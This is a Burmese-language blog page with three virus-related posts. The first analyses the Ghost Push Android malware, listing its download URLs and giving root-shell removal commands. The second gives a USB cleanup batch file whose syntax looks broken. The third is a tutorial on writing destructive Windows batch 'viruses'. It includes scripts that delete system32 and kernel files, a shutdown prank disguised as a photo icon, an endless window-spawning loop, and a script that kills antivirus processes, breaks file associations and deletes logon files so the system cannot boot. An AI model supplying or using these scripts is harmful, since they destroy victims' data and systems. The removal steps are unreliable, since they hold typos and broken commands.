Popular Posts

Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Monday, August 15, 2016

Ghost Push - Monkey Test & Time Service ဗိုင္းရပ္စ္


2015 August လအတြင္းမွာ Coolpad ဖုန္း သံုးတဲ့သူေတြဟာ Official update လုပ္ၿပီးတဲ့ေနာက္ သူတို႔ရဲ့ ဖုန္းေတြမွာ MonkeyTest နဲ႔ TimeService ဆိုတဲ့ ဗိုင္းရပ္စ္ ၀င္ေရာက္ေနတာကို ေတြ႕ရပါတယ္။ 
အဲဒီဗိုင္းရပ္စ္ ေတြဟာ Ghost Push ဆိုတဲ့ ဗိုင္းရပ္စ္ က အရင္၀င္ေရာက္ၿပီးမွ ေရာက္လာၾကတာ ျဖစ္ပါတယ္။ စက္တင္ဘာ (၁၈) ရက္ေန႔မွာဆိုရင္ ဗိုင္းရပ္စ္ ၀င္ေရာက္ကူးစက္ခံရတဲ့ ဖုန္းအေရအတြက္က တရက္ကို (၇)သိန္းအထိ ရွိလာခဲ့ပါတယ္။ Samsung, Coolpad, Moto အပါအ၀င္ ဖုန္းေမာ္ဒယ္ (၁)ေသာင္းေက်ာ္ ကူးစက္ခံခဲ့ရပါတယ္။
စူးစမ္းစစ္ေဆးခ်က္ေတြအရ ဒီဗိုင္းရပ္စ္ အဓိက ကူးစက္ခံရတာက အေမရိက၊ ရရွား၊ အေရွ႕ေတာင္အာရွ နဲ႔ တရုတ္ေတာင္ပိုင္း ေဒသေတြ ျဖစ္ပါတယ္။


Ghost Push ဟာ system-level access ကို ရယူပါတယ္။ ၿပီးရင္ ဖုန္းကို root လုပ္ပါတယ္။ MonkeyTest နဲ႔ TimeService ေတြကို ထပ္ၿပီး download ခ်ပါတယ္။ ဖုန္းဟာ အလြန္ေလးလံသြားမယ္၊ ဘက္ထရီ အျမန္ကုန္သြားမယ္၊ အင္တာနက္ network traffic ကို သိသိသာသာ ဆြဲသံုးမယ္။ အႏၱရာယ္ႀကီးတာက ဒီဗိုင္းရပ္စ္ေတြကို အလြယ္တကူ သတ္လို႔မရပဲ၊ Uninstall လုပ္ရင္လဲ ဖုန္းကို restart လုပ္လိုက္တာနဲ႔ ျပန္ေပၚလာပါတယ္။

အဲဒီေတာ့ Ghost Push ဘယ္လို အလုပ္လုပ္သလဲ၊ ဘယ္လို ရွင္းထုတ္ ရမလဲဆိုတာ ေလ့လာၾကည့္ၾကပါမယ္။

Ghost Push ဟာ ဖုန္းရဲ့ root access ကို ရယူတယ္။ အင္တာနက္ data ကို သံုးၿပီး ေၾကာ္ျငာေတြကို ဆြဲခ်ပါတယ္။ ဖုန္းသံုးသူမသိလိုက္ပဲ အျခား အသံုးမ၀င္တဲ့ application ေတြကိုလဲ download ခ်ပါတယ္။
Hacker ေတြက Ghost Push ဗိုင္းရပ္စ္ code ေတြကို နံမယ္ႀကီး application ေတြမွာ ညွပ္ထည့္ၿပီး original application ပံုစံနဲ႔ ျဖန္႔ေ၀ပါတယ္။ သံုးတဲ့သူေတြက အစစ္အမွန္ထင္ၿပီး install လုပ္လိုက္မိခ်ိန္မွာ ျပႆနာ တက္ေတာ့တာပါပဲ။ ဗိုင္းရပ္စ္ပိုး ထည့္သြင္းခံထားရတဲ့ application ေတြကို ေနာက္ဆက္တြဲ (၁) မွာ ေဖာ္ျပထားပါတယ္။

(၁) ဗိုင္းရပ္စ္ ၀င္ေရာက္ျပန္႔ႏွံ႔ပံုအား ေလ့လာျခင္း
------------------------------------------------



(၁-က) Root ရေအာင္ လုပ္ျခင္း
--------------------------------


Ghost Push ဟာ ဖုန္းေမာ္ဒယ္ နဲ႔ အျခား information ေတြကို "http://api.aedxdrcb.com/ggview/rsddateindex" ဆိုတဲ့ server ဆီကို ေပးပို႔ပါတယ္။ အဲဒီကေနမွ http://down.upgamecdn.com/onekeysdk/tr_new/rt_0915_130.apk ကေန root toolkit ကို download ခ်ပါတယ္။ ၿပီးတာနဲ႔ ဖုန္းကို တိတ္တိတ္ေလး root ေဖာက္ပါတယ္။ ေနာက္တဆင့္အေနနဲ႔ debuggerd ဖိုင္ကို အစားထိုးတယ္၊ install-recovery.sh ဖိုင္မွာ code ေတြ ျပင္တယ္၊ /system/xbin folder ထဲမွာ bin ဗိုင္းရပ္စ္ ဖိုင္ေတြ ဖန္တီးတယ္၊ ROM virus ကို install လုပ္ပါတယ္။ /system/priv-app, /system/app folder ေတြထဲမွာ "camera_update" လိုဖို္င္ေတြ ဖန္တီးပါတယ္။

camera_update ဟာ ဗိုင္းရပ္စ္ ဖိုင္ျဖစ္ၿပီး /system/priv-app folder ထဲမွာ ရွိေနပါတယ္။ အဲဒီ ဗိုင္းရပ္စ္ဟာ ဖုန္းရဲ့ ROM ထဲကို ၀င္ေနၿပီး uninstall လုပ္လို႔ မရေအာင္ လုပ္ထားပါတယ္။ ဒီ ဖိုင္ကေနပဲ http://massla.hdyfhpoi.com/gkview/info/801 ကေန MonkeyTest, http://u.syllyq1n.com/mmslow/api/821 ကေန TimeService apk ေတြကို install လုပ္ယူပါတယ္။ ၿပီးေတာ့ အျခား ဘာမွန္းမသိတဲ့ application ေတြကိုလဲ install လုပ္ယူပါတယ္။


(၂) မူရင္းဗိုင္းရပ္စ္ကို သတ္မရေအာင္ အကာအကြယ္ လုပ္ထားပံု
------------------------------------------------------------------

(၂-က) ROM ထဲက မူရင္း ဗိုင္းရပ္စ္ကို Bin က အကာအကြယ္ ေပးထားတယ္
------------------------------------------------------------------------------




စက္ကို ပါ၀ါစဖြင့္တာနဲ႔ install-recovery.sh နဲ႔ debuggerd ဖိုင္ေတြကို execute လုပ္ပါတယ္။ အဲဒီ ဖိုင္၂ခုကေန ဗိုင္းရပ္စ္ bin ဖိုင္ကို execute ဆက္လုပ္ပါတယ္။ ဒီဟာက ROM ထဲမွာ ရွိေနတဲ့ မူရင္းဗုိင္းရပ္စ္ကို အကာအကြယ္ေပးၿပီး ဆက္ run ေနေစတယ္၊ မူရင္းဗိုင္းရပ္စ္ ရဲ့ ေနာက္ဆံုး installation package ကို ရယူပါတယ္။
တကယ္လို႔ မူရင္းဗိုင္းရပ္စ္ကို uninstall လုပ္လုိက္ရင္ Bin ဖိုင္ကပဲ ဗိုင္းရပ္စ္ကို ထပ္ download ခ်ၿပီး ROM ထဲမွာ ျပန္ install လုပ္ပါတယ္။


 

 
(၂-ခ) Bin ဖိုင္ကို ဖ်က္လို႔ မရေအာင္ လုပ္ထားတယ္
---------------------------------------------------


စက္က run ေနခ်ိန္မွာ Bin ဖိုင္ဟာ "chattr +I" command ကို သံုးၿပီး သူ႔ကိုဖ်က္လို႔မရေအာင္ ကာကြယ္ထားတယ္။


(၂-ဂ) APK ဖိုင္ကို ဖ်က္လို႔မရေအာင္ လုပ္ထားတယ္

----------------------------------------------------

Ghost Push ကလဲ user ေတြ သူ႔ကို ဖ်က္လို႔မရေအာင္ "chattr +I" နဲ႔ ကာကြယ္ထားတယ္။


၃။ ဗိုင္းရပ္စ္ က ဘာေတြ လုပ္သလဲ
------------------------------------

(၃-က) ေၾကာ္ျငာမ်ား ဆြဲခ်ျပျခင္း
---------------------------------


ဖုန္းသံုးတဲ့သူက အင္တာနက္ ဖြင့္လိုက္တာနဲ႔ ဗိုင္းရပ္စ္ ဖို္င္ေတြက ေၾကာ္ျငာေတြကို download ဆြဲခ်ၿပီး ဇြတ္ျပတယ္။ သူက wifi connection ကို ပိတ္ပစ္ၿပီး ဖုန္းရဲ့ data ကို သံုးတယ္။


(၃-ခ) Application မ်ား install လုပ္ျခင္း
----------------------------------------

http://m.AEDXDRCB.COM/gcview/api/910 ကေန MonkeyTest နဲ႔ TimeService ကို download ခ်၊ install လုပ္ယူတယ္။ ဒီလို ေၾကာ္ျငာေတြ push လုပ္တာ၊ apk ေတြ push လုပ္တာေတြအတြက္ Ghost Push ဟာ SQLite Database ကို သံုးတာ ေတြ႔ရတယ္။


(၃-ဂ) Booster ကုိ သံုးျခင္း

-----------------------------

Application ေတြကို download ခ်ႏိုင္ဖို႔၊ install လုပ္ႏိုင္ဖို႔အတြက္ Accessibility ထဲက Booster ကို ဖြင့္ခိုင္းတတ္ပါတယ္။






(၄) ဗိုင္းရပ္စ္ ျပႆနာ ေျဖရွင္းနည္း
-------------------------------------

(၄-က) StubbornTrjKiller

Google Play မွာ ဒီဗိုင္းရပ္စ္ကို သတ္တဲ့ APK ကို ေအာက္က Link မွာ download ခ်ၿပီး သံုးႏိုင္ပါတယ္။
https://play.google.com/store/apps/details…

(၄-ခ) ကိုယ္တိုင္ သတ္နည္း

ဖုန္းဟာ Root လုပ္ၿပီး ျဖစ္ရပါမယ္။ Busybox install လုပ္ၿပီး ျဖစ္ရပါမယ္။

ဖုန္းကို ကြန္ပ်ဴတာနဲ႔ ခ်ိတ္ပါ။ adb shell ကေန "su" command ကို သံုးၿပီး root permission ယူပါ။
-----------------------------------------------------------

adb shell မွာ ေအာက္က command ေတြကို ရိုက္ထည့္ပါ။
------------------------------------------------------------

ps | grep .base ‪#‎get‬ the pid of file .base
kill pid
---------------------

Bin ဖိုင္ကို ဖယ္ရွားဖို႔
---------------------
mount -o remount rw /system ‪#‎different‬ system may use different command
chattr –ia /system/xbin/.ext.base
chattr –ia /system/xbin/.bat.base
chattr –ia /system/xbin/.zip.base
chattr –ia /system/xbin/.word.base
chattr –ia /system/xbin/.look.base
chattr –ia /system/xbin/.like.base
chattr –ia /system/xbin/.view.base
chattr –ia /system/xbin/.must.base
chattr –ia /system/xbin/.team.base
chattr –ia /system/xbin/.type.base
chattr –ia /system/xbin/.b
chattr –ia /system/xbin/.sys.apk
chattr –ia /system/xbin/.df
chattr –ia /system/bin/daemonuis
chattr –ia /system/bin/uis
chattr –ia /system/bin/debuggerd
chattr –ia /system/bin/nis
chattr –ia /system/bin/daemonnis
chattr –ia /system/bin/.daemon/nis
chattr –ia /system/bin/uis
chattr –ia /system/bin/.sr/nis
chattr –ia /system/bin/mis
chattr –ia /system/bin/daemonmis
chattr –ia /system/bin/.daemon/mis
chattr –ia /system/bin/.sc/mis
rm /system/xbin/.ext.base
rm /system/xbin/.bat.base
rm /system/xbin/.zip.base
rm /system/xbin/.word.base
rm /system/xbin/.look.base
rm /system/xbin/.like.base
rm /system/xbin/.view.base
rm /system/xbin/.must.base
rm /system/xbin/.team.base
rm /system/xbin/.type.base
rm /system/xbin/.b
rm /system/xbin/.sys.apk
rm /system/xbin/.df
rm /system/bin/daemonuis
rm /system/bin/uis
rm /system/bin/debuggerd
rm /system/bin/nis
rm /system/bin/daemonnis
rm /system/bin/.daemon/nis
rm /system/bin/uis
rm /system/bin/.sr/nis
rm /system/bin/mis
rm /system/bin/daemonmis
rm /system/bin/.daemon/mis
rm /system/bin/.sc/mis
cp /system/bin/debuggerd_test /system/bin/debuggerd
------------------
ဒါနဲ႔မွ မရေသးရင္
------------------
chattr –ia /system/priv-app/cameraupdate.apk
chattr –ia /system/priv-app/com.android.wp.net.log.apk
rm -rf /data/data/com.android.camera.update
rm -rf /data/data/com.android.wp.net.log
rm /systam/priv-app/cameraupdate.apk
rm /systam/priv-app/com.android.wp.net.log.apk
adb shell
cp /system/etc/install-revcovery.sh /sdcard/
adb pull /sdcard/install-revcovery.sh
adb push install-revcovery.sh /sdcard/
cp /sdcard/install-revcovery.sh /system/etc/
open /system/etc/install-recovery.sh,remove code below.
/system/bin/daemonuis --auto-daemon &
#!/system/bin/sh
/system/xbin/.ext.base &
#!/system/bin/sh
/system/xbin/.ext.base &
====================

(၄-ဂ) လံုၿခံဳေရး အႀကံျပဳခ်က္

Ghost Push ဗိုင္းရပ္စ္ ဟာ ေၾကာ္ျငာ SDK ေတြ၊ browser ေၾကာ္ျငာေတြ ကေန ကူးစက္တတ္ပါတယ္။ နံမယ္ႀကီး Application ပံုစံအေနနဲ႔လဲ ဟန္ေဆာင္ၿပီး လာတတ္ပါတယ္။ ဒီဗုိင္းရပ္စ္ရဲ့ source ကို ေလ့လာၾကည့္တဲ့အခါ တရုတ္ကုမၸဏီ Xinyinhe ကလာတာကို ေတြ႔ရပါတယ္။ Key ROOT master နဲ႔ အဆက္အစပ္ ရွိႏိုင္ပါတယ္။

http://www.ngemob.com နဲ႔ http://root.ngemob.com ကို Xinyinhe က ပိုင္ဆိုင္ပါတယ္။
Key Root Master http://www.dashi.com/ က http://www.ngemob.com ရဲ့ IP address နဲ႔ အတူတူပါပဲ။

ဆက္စပ္စဥ္းစားႏိုင္ဖို႔ ျဖစ္ပါတယ္။

=====================

ေနာက္ဆက္တြဲ(၁)
--------------------
ဗိုင္းရပ္စ္ ကူစက္ထားေသာ Application မ်ား
--------------------------------------------

WiFi Enhancer
TimeService
Indian Sexy Stories 2
Assistive Touch
Accurate Compass
All-star Fruit Slash
Happy Fishing
MonkeyTest
PinkyGirls
XVideo Codec Pack
Amazon/应用中心
Hubii News
itouch
Light Browser
XVideo
Memory Booster
WordLock
Fast Booster
Talking Tom 3
Photo Clean
Super Mario
SmartFolder
Simple Flashlight
Daily Racing
SettingService
boom pig
WhatsWifi
Hot Video
Lemon Browser
Multifunction Flashlight
小白点/Assistive Touch
Hot Girls
Sex Cademy
iVideo
Fruit Slots
Wifi Speeder
WiFi FTP
Ice Browser
PronClub
======================

Ref: CheetahMobile


Ref:www.kyawzinhein.net

Monday, June 9, 2014

Memory Stick မွာမၾကာခဏေတြ ့တတ္ေသာ virus မ်ားရွင္းနည္း...


Stick ေတြမွာၾကံဳတက္တဲ့ၿပသာနာေလးေတြပါေၿဖရွင္းတဲ့နည္းေလးေၿပာၿပမွာပါ…သိၿပီးသားဆုိတဲ့ အကုိ အမ ညီ ညီမ ဆုိလည္းသည္းခံၿပီးဆက္ဖတ္ေပးပါေနာ္…တကယ္လုိအမွားပါခဲ့ရင္ေၿပာၿပၾကပါေနာ္.... သူငယ္ခ်င္းတုိ ့ၾကဳံဖူးၾကမွာပါ… Memory Stick ထုိးလုိက္တာနဲ ့.. Autorun.inf တုိ ့ Recycled.exe တုိ ့ Rundll32.exe တုိ ့…ဘာတုိ ့ညာတုိ ့ေပါ့…အဲဒီ virus ေတြ ့ကုိ USB Disk Security မွာလာၿပတယ္ေလ.. အဲဒါေတြကုိ အရမ္းေကာင္းတယ္ဆုိတဲ့… Kesper ကေတာင္မဖ်က္ႏုိင္ဘူး… USB Disk Security မွာ Delete လုပ္လဲတစ္ခ်ိဳ ့ဟာေတြကုိ Delete လုပ္လုိ ့မရဘူးေလ…. အဲဒီေတာ့ ဘာ Software မွာသုံးစရာမလုိ ့တဲ့ က်ေနာ္ေပးတဲ့ နည္းေလးကုိသုံးၾကည္ ့လုိက္ပါ....ရွိသမွ် virus ေတြေသသြားေစရမယ္…က်ေနာ္ရဲ႕  virus ရွင္းတဲ့ နည္းလမ္းကတစ္ၿခားေထြေထြထူးထူး ဘာမွ မဟုတ္ပါဘူး…. Bat File နဲ ့ Command ေတြေရးၿပီးရွင္းတဲ့နည္းေလးပါ… ပထမဦးဆုံး Notepad တခုကုိဖြင့္ပါ..ၿပီးရင္ ေအာက္မွာ က်ေနာ္ေပးထားတဲ ့ Command ေတြကုိ Copy ကူးထည္ ့လုိက္ပါ…  @echo del: E:Autorun.inf del: F:Autorun.inf del: G:Autorun.inf del: H:Autorun.inf del: E:Recycled.exe del: F:Recycled.exe del: G:Recycled.exe del: H:Recycled.exe del: E:RUNDLL32.exe del: F:RUNDLL32.exe del: G:RUNDLL32.exe del: H:RUNDLL32.exe @echo    ၿပီးရင္ေတာ့..နာမည္တစ္ခုခု .bat (eg. Kill.bat) ဆုိၿပီး ကုိယ့္ရဲ  ့ Memory Stick ထဲမွာ Save လုိက္ပါ…  အဲဒီ Kill.bat ဆုိတဲ့  file ေလးကုိေတာ့မဖ်က္ပစ္လုိက္ပါနဲ ့ေနာ္…. Stick ထုိးတုိင္း အဲဒီ file ေလးကုိ double click လုပ္ၿပီး run လုိက္ေပါ့… ဒါဆုိရင္ကုိယ့္ရဲ ့ Memory Stick ထဲမွာ virus ေတြအကုန္ရွင္းသြားလိမ့္မယ္…
bat file ေရးတတ္တယ္မထင္ပါနဲ႕...က်ေနာ္ က်ေနာ္႕ ဆရာတေယာက္ကို အကူအညီေတာင္းၿပီး ေရးခိုင္းလိုက္တာပါ....က်ေနာ္႔ အရည္အခ်င္းမွန္ဆို မေရးႏိုင္ပါဘူး...က်ေနာ္က software ေတြေလွ်ာက္ရွာၿပီး ကလိ ေနတာပဲရွိတာပါ....အဆင္ေၿပသြားတဲ႕ သူငယ္ခ်င္းေတြ comment ေလးေတာ႕ခ်န္ခဲ႔ပါဗ်ာ....

Friday, April 25, 2014

ဗိုင္းရပ္ ျပဳလုပ္နည္းႏွင့္ ေျဖရွင္းနည္း

ဗိုင္းရပ္ ျပဳလုပ္နည္းႏွင့္ ေျဖရွင္းနည္း

ပံုမွန္ အလုပ္လုပ္ေနတဲ႔ ကြန္ျပဴတာကို ဖိုင္တစ္ခုခု ေၾကာင္႔ အေႏွာင္႔ အယွက္ ျဖစ္ေစမယ္ဆိုရင္
အဲဒီဖိုင္ဟာ Virus လို႔ ေခၚႏိုင္ပါတယ္။ Window system မ်ား ပ်က္စီးၿပီး ၊ data မ်ားဆံုး႐ွူံးသည္ အထိျဖစ္ႏိုင္ပါတယ္။ ( က်ေနာ္ေလ႔လာမိသေလာက္က Virus ေၾကာင္႔
Hardware ပ်တ္စီးမႈ မရိွတာ ႏွစ္ ၂၀ ေက်ာ္ခဲ႔ပါၿပီ ။ )
အလြယ္ဆံုးနဲ႔ အႏ ၱရာယ္ အကင္းဆံုးက စေရးၾကရေအာင္ ….. shutdown virus ကို ေတြ႔ဖူးေနၾကပါ ( က်ေနာ္လည္း ေယာင္ေတာင္ေတာင္နဲ႔ မိဘူးပါတယ္ )
အရင္ဆံုး Desktop ေပၚမွာ R-click လုပ္ၿပီး New – Shortcut ကို click ပါတယ္ ။ New shortcut ဆိုတဲ႔
icon နဲ႔ အတူ Creat shortcut ဆိုတဲ႔ box ေပၚလာပါတယ္။
Text box ေနရာေလးမွာ ဒါေလးကို ႐ိုက္ထည္႔ေပးပါ ။ (space ျခားတာ မွန္ဖို႔ လိုပါတယ္။) shutdown -s -t 60 -c “WARNING a virus has been detected on your computer, emergency shutdown initiated”
(60 ဆိုတာက မိမိ ဘယ္ေလာက္ အခ်ိန္ အတြင္းမွာ shutdown က်သြားေစခ်င္လဲ ဆိုတဲ႔ စကၠန္႔ ျဖစ္ပါတယ္။ ” ” ၾကားထဲက စာသားကေတာ႔ ႀကိဳက္တာေရးႏိုင္ပါတယ္။ )
Image Hosting by Picoodle.com
Next ႏိွပ္လိုက္ရင္ Select a Tittle for the program ဆိုတဲ႔ box ေပၚပါတယ္။ နာမည္ကို လည္းႀကိဳက္တာေပးပါ။ ၿပီးရင္ finish ေပါ႔။
မိမိေပးလိုက္တဲ႔ နာမည္နဲ႔ ေပၚလာတဲ႔ shortcut ေလးကို R-Click လုပ္ၿပီး properties ႏိွပ္ပါတယ္။ Change icon ဆိုတာေလး click ၿပီး icon ေျပာင္းေပးပါ။
Image Hosting by Picoodle.com
တစ္ခါမွ မျမင္ဘူးတဲ႔ icon ဆိုရင္ေတာ႔ ဘယ္သူ ဖြင္႔ ၾကည္႔ ပါ႔မလဲ ေနာ္.. ။ က်ေနာ္ကေတာ႔ JPEG icon ေလးပဲ ေရြးလိုက္ပါတယ္။ Desktopn ေပၚမွာ photo ေလးတစ္ခု
အတိုင္းျဖစ္ေနပါတယ္။
Run ၾကည္႔ ရေအာင္ဗ်ာ …. ။
D-click ေပးလိုက္တာနဲ႔ ေအာက္မွာ ျပထားတဲ႔ အတိုင္းေပၚလာပါတယ္ ။ မသိရင္ေတာ႔ ေတာ္ေတာ္ လန္႔သြားမွာဗ် ။ ဘယ္ေနရာမွ လည္း ႏွိပ္ လို႔ မရဘူး၊ ဘာနဲ႔ မွလည္း
ပိတ္လို႔မရပါဘူး ။ ဒါဆို ဒီအတိုင္း shutdown က်သြားတာကို ထိုင္ၾကည္႔ေနမွာလား …..။ ဟဲဟဲ
Image Hosting by Picoodle.com
run ေလးကို ေခၚၿပီး shutdown -a လို႔ သတ္မွတ္ခ်ိန္ မျပည္႔ ခင္ေလးမွာ ႐ိုက္ထည္႔ၿပီး enter ေခါက္လိုက္ပါ။ shutdown virus ျပန္ပိတ္သြား ပါလိမ္႔မယ္။
Image Hosting by Picoodle.com
စမ္းၾကည္႔ႏိုင္ပါတယ္ အႏ ၱရာယ္ကင္းပါတယ္။ :z
က်ေနာ္လည္း project အသစ္တစ္ခုအတြက္ လံုးပန္းေနတာနဲ႔ ဘာမွ အသစ္မေရးျဖစ္ဘူး ျဖစ္ေနတယ္ဗ်ာ.. ။ လာလာလည္ၾကတဲ႔ သူမ်ားကို အားလည္းနာ၊ ေက်းဇူးလည္း တင္ပါတယ္။ က်ေနာ္ မေရးေတာ႔ဘူးလို႔ ဆံုးျဖတ္ထားတာ တစ္ခုကို ေရးလိုက္ပါ႔မယ္ ။ အခု ေျပာျပမွာက တကယ္ကို အႏ ၱရာယ္ ရိွတဲ႔ Virus ေရးနည္း ျဖစ္ပါတယ္ ။ အမ်ိဳးမ်ိဳးရိွ ၾကေပမယ္႔ ေလ႔လာမိသေလာက္ ေရးနည္း က ဒါေတြပါပဲ ။ မစိုးရိမ္ပါနဲ႔ ထံုးစံ အတိုင္း Virus ကာကြယ္ေရးပါ ေျပာျပပါ႔မယ္။ notepad နဲ႔ Virus ေရးမယ္ဆိုရင္ ေတာ္ေတာ္မ်ားမ်ား ေအာက္ပါအတိုင္းပဲ ေရးပါတယ္။ မွတ္ခ်က္။ သံလံုငယ္ မွ ကူးယူ ေဖၚျပသည္။ 1………….
@echo del off C:\\windows\system32
2………….
@echo off
del C:\\windows\system32
3………….
del “C:\windows\system32\bootok” /Q/S >nul
del “C:\windows\system32\bootvid” /Q/S >nul
del “C:\windows\system32\bootvrfy” /Q/S >nul
4………….
del “C:\windows\pchealth\”
del “C:\windows\system\”
del “C:\windows\system32\restore”
del “C:\windows\system32\autoexec.nt”
del “C:\windows\system32\logonui.exe”
del “C:\windows\system32\ntoskrnl.exe”
စတာေတြကို ေရးၿပီး ဖိုင္နာမည္ကို ႀကိဳက္ရာေပး File type ကိုေတာ႔ .bat,.exe နဲ႔ save ႏိုင္ပါတယ္။(ဥပမာ – filename.bat , filename.exe)အေပၚမွာ ၄ မ်ိဳး ဥပမာျပတာပါ။ အမ်ားႀကီး ကိုရိွပါတယ္။ ဒီေလာက္ျမင္ၿပီးရင္ေတာ႔ သေဘာေပါက္ ေလာက္ပါၿပီေနာ္။ del ဆိုတာက ျဖတ္ျပစ္ဖို႔ command ေပးတာ ျဖစ္ပါတယ္။ ဘာေတြကိုျဖတ္ဖို႔လဲ ဆိုတာ အေပၚမွာ ျမင္တဲ႔ အတိုင္းပါပဲ ။ window program အရ bat ဖိုင္နဲ႔ command ေပးၿပီး ျဖတ္ေစတာ ျဖစ္လို႔ ဘယ္ Antivirus နဲ႔မွ မမိပါဘူး။ notepad မွာေရးတဲ႔႔ command code ေတြသိခ်င္ ေတာ႔ ဒီမွာသြားၾကည္႔ ႏိုင္ပါတယ္။
( အထက္ပါေဖာ္ျပထားေသာ Virus ၄မ်ိဳး မွာ တကယ္ အႏ ၱရာယ္ရိွတဲ႔ virus မ်ားျဖစ္ပါတယ္။ စမ္းသပ္ရန္မဟုတ္ပါ။ တစ္ဦးတစ္ေယာက္အား ဒုကၡေပးရန္လည္း မဟုတ္ပါ။ ဗဟုသုတေပးရန္သာ ရည္ရြယ္ပါသည္။ )
mryto Jul 10 ’10
Message #1
က်ေနာ္ေရးခ်င္တာမွ လက္ကိုယားေနတာ သူငယ္ခ်င္းေတြ တားေနလို႔ နည္းနည္းထိန္းထားရတာ ။ တစ္ေန႔တစ္ေန႔ virus ေတြေရးနည္း တင္ဖို႔ေလာက္ပဲ အာရံုေရာက္ေနတာ။ အခု တစ္ခုေလာက္ လုပ္ၾကည္႔ၾကမယ္ဗ်ာ ။ ဆိုးက်ိဳးကို အရင္သိခ်င္ၾကမွာေပါ႔ ေနာ္ … ။ casing မွာ ရိွတဲ႔ restart ခလုပ္ႏိုပ္ၿပီး restart လုပ္ရ႐ုံမွ တစ္ပါး အျခားဆိုးက်ိဳးမရိွပါ ။ (atomic bomb)ဗံုးတစ္လုံးေပါက္ကြဲသလို ဆက္တိုက္ ဆက္တိုက္ တစ္ခုၿပီးတစ္ခု ပြင္႔လာပါလိမ္႔ မယ္။ ဘာ key မွ ႏိုပ္မရေတာ႔ သလို၊ ဘာ command မွ လုပ္မရေတာ႔ပါ ။ ထံုးစံအတိုင္း notepad ေလးတစ္ခု ေခၚၿပီး ေအာက္ပါအတုိင္းေရးလိုက္ပါ … ရွင္းရွင္းေလးပါေနာ္
@echo off
:A
start dir
start command
start firefox
start explorer
start notepad
goto:A
ဆိုၿပီး ေရးလိုက္ၿပီး file name တစ္ခုခု (မိမိႀကိဳက္ရာ) ေပးၿပီး .bat နဲ႔ save လိုက္ပါတယ္ ။ (file name.bat)
ၿပီးရင္ေတာ႔ D-click ေလးေပးၾကည္႔လိုက္ပါ ။ တစ္ခုၿပီး တစ္ခု ပြင္႔လာတဲ႔ ဖိုင္ေတြက ခင္ဗ်ား ဆက္မၾကည္႔ရဲေအာင္ ျဖစ္လာပါလိမ္႔မယ္ ။ ဘာနဲ႔မွပိတ္ဖို႔ မႀကိဳးစားပါနဲ႔ ။ restart ခလုပ္ေလးကို သာႏိုပ္လိုက္ပါ ။ အားလံုး အဆင္ေျပသြားပါလိမ္႔မယ္ ။ ေပ်ာ္ရႊင္ၾကပါေစ …. ။
(စမ္းသပ္ၾကည္႔ႏိုင္ပါတယ္ ။ က်ေနာ္ကိုယ္တိုင္ စမ္းၿပီးပါၿပီ ။ခင္ဗ်ား ၿပံဳးစိစိ ျဖစ္သြားပါလိမ္႔မယ္)
ကဲကိုယ္ပိုင္ဗိုင္းရက္စ္ေရးၾကမယ္ CMDနဲ႕Notepadကိုသံုးလို႕
ျမန္မာHackerအသင္း
ကဲကိုကိုမမ ဟက္ကာတို႕ေရ ေရးတာလဲေရးရတယ္ေပါမွာလဲေၾကာက္သဗ် . .
အခု Notepadနဲ႕ cmdသံုးျပီးေတာ့ ဗ်ာ ၀င္းဒိုးxp
ကိုစုပ္ျပက္သက္သြားေအာင္ေမႊၾကမယ္ ကဲေျပာၾကဦး
မျဖစ္ႏိုင္ဘူးလို႕ . . . ျဖစ္ႏိုင္တာေပါ့ဗ်ာ . . . .
ကဲေအာက္က codeေလးေတြကိုေသခ်ာၾကည္႕ ေကာ္ပီဆိုျပီး ေပစ္တင္ျပီးမဟုတ္ဘူးေနာ္. .
တစ္လံုးခ်င္းစီရွင္းျပေပးမယ္ေအာက္မွာ အဲဒိေတာ့ Notepadေလးဖြင့္ျပီး လိုက္ေရးေပါ့
title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown
titleတို႕@echo offတို႕က ကၽြန္ေတာ့္ညီမေပါက္စေလးေမးေတာင္သိေနေတာ့ေျပာရင္
ကၽြန္ေတာ့ ဟက္ကာေတြေစာ္ကားရာၾကမယ္ ဒီေတာ့မရွင္းေတာ့ဘူးေနာ္. . . ။
အဲရွင္းျပမယ္သာေျပာတာပါ အခုနကုဒ္ေတြက အကုန္သိၾကပါတယ္ . .။
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
ဒီဟာေတြကိုေျပာျပမယ္ဗ်ာ ဒီလို
၀င္းဒိုးရဲ႕အဓိက processေတြကိုend task လုပ္ဖို႕ေရးတာဗ်
အဲဒါဆိုexplorerၾကသြားလိမ့္မယ္ဗ်ာ . .
cls ကေတာ့သိတဲ့အတိုင္းေလ ေနာက္ေၾကာင္းရွင္ဖို႕ေပါ့ . . . ။
assoc .exe=txtfile
assoc .txt=mp3file
ဒါကေတာ့ .exe fleနဲ႕.txtဖိုင္ေတြဖြင့္မရေအာင္လုပ္တဲ့ကြန္႕မန္႕ေပါ့ဗ်ာ
တခ်ား extentionေတြလဲထည္႕သံုးလို႕ရတယ္ဗ်ာ.
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what happens.
အဲဒိေနရာမွာ
ကိုေရးခ်င္္တဲ့စာကိုျပင္ေရးဗ် msg *အေနာက္မွ englishလုိပဲေနာ္
comment boxေလးနဲ႕တက္လာလိမ္မယ္. . .
ေအာက္ဆံုးကဟာကအေတာ္ေလးဆိုးတယ္ဗ်. . .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
အဲဒိဟာက shutdown တို႕log onတို႕ ကိုျဖက္ျပစ္တာ
အဲဒိအတြက္သင့္ကြန္ျပဴတာက ရွက္ေဒါင္းခ်လို႕မရေတာ့ဘူး
log onကိုျဖက္ျပီး ျပီျဖစ္တဲ့အတြက္ resetလုပ္လိုက္ ရင္ ၀င္းဒိုးျပန္မတက္ေတာ့ဘူး
ကဲဘယ္လိုလုပ္မလဲ. . . .။
